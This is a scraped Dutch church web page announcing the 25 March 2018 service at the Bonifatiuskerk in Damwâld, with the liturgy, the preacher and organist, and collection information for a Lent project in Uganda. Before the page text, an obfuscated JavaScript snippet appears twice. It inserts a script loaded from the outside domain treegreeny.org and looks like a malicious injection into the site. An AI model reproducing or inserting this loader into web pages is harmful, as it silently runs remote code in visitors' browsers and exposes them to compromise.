;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 25 maart 2018 9:30 uur - PKN Damwâld
zondag 25 maart 2018
09:30 uur
Voorbereiding Heilig Avondmaal

Kerkdienst zondag 25 maart 2018 9:30 uur

Informatie

Voorganger:Ds. R.C.E. Lafeber, Gorredijk
Organist:Nienke van der Heide-Visser
Mededeling:Voorbereiding Heilig Avondmaal
Liturgie
Lied voor de dienst Gez. 45 : 1, 6
Welkom en mededelingen
Aanvangslied Ps. 24 : 1, 3, 4
stil gebed - bemoediging - groet
We zingen: Gez. 177 : 1
gebed van verootmoediging
We zingen: Gez. 177 : 2, 5
genadeverkondiging .
We zingen: Gez. 177 : 6, 7
gebed om verlichting met de Heilige Geest
We lezen: Luc. 19 : 29-40
We zingen: Gez. 127 : 1, 6, 7
We lezen: Luc. 20 : 9-19
We zingen: Ps. 118 : 8, 10
Verkondiging .
We zingen: Elb 376
voorbereiding Heilig Avondmaal : lezing formulier .
dankgebed - voorbeden - stil gebed - ‘onze Vader’
Collecte
slotlied Elb 346 : 1, 2, 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Steun voor kwetsbare gezinnen

40-Dagentijd: Steun voor kwetsbare gezinnen in Noord-Oeganda
Moeders zijn de ruggengraat van de Oegandese samenleving, maar armoede, ziekte en huiselijk geweld maken hun leven zwaar. Mothers' Union, het vrouwen netwerk van de Orthodoxe Kerk, wil hier verandering in brengen. Medewerkers bezoeken vrouwen in afgelegen dorpen en leren hen nieuwe vaardigheden aan, bijvoorbeeld hoe zij uit armoede kunnen komen en hoe een stabiel gezinsleven kinderen tot bloei kan brengen. Ook geeft Mothers'Union voorlichting over hiv/aids, traint ze vrouwen in het omgaan met conflicten en versterkt ze de positie van vrouwen in de kerk. Deze activiteiten zijn zeer succesvol. Moeders voelen zich door dit netwerk gesterkt om een actievere rol te spelen in hun gezin, kerk en dorp. Collecteert u in de veertigdagentijd mee voor dit werk?

Tweede collecte: Kerk
Uitganscollecte: Kerk